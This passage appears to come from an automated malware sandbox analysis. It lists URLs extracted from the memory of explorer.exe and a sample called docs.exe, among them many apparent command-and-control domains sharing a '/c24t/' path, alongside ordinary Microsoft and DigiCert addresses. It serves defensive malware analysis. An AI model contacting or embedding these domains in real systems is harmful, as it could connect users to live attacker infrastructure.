          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000006.00000000.2155015039.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2155041109.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4588766205.00000000028A0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: docs.exe, 00000000.00000002.2160016383.0000000002FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.23fd595ig.autos
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.23fd595ig.autos/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.23fd595ig.autos/c24t/www.j88.travel
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.23fd595ig.autosReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.472.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.472.top/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.472.top/c24t/www.earing-tests-69481.bond
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.472.topReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events/c24t/www.amilablackwell.online
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.eventsReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amilablackwell.online
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amilablackwell.online/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amilablackwell.online/c24t/www.eviewmadu.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amilablackwell.onlineReferer:
          Source: explorer.exe, 00000006.00000003.2981207775.000000000C3E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986623556.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C3E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz/c24t/www.hecreature.tech
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click/c24t/www.ridges-freezers-56090.bond
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.clickReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net/c24t/www.aithful.events
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.netReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond/c24t/www.delark.click
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bondReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eviewmadu.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eviewmadu.top/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eviewmadu.top/c24t/www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eviewmadu.topReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecreature.tech
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecreature.tech/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecreature.tech/c24t/www.ealerslot.net
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecreature.techReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel/c24t/www.venir-bienne.info
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travelReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/www.23fd595ig.autos
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.netReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/c24t/www.consuyt.xyz
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.eventsReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond
          Source: explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bondReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uijiuw.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uijiuw.top/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uijiuw.top/c24t/www.oko.events
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uijiuw.topReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info/c24t/www.472.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.infoReferer:
          Source: explorer.exe, 00000006.00000000.2158468861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000006.00000000.2163588037.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
          Source: explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
          Source: explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
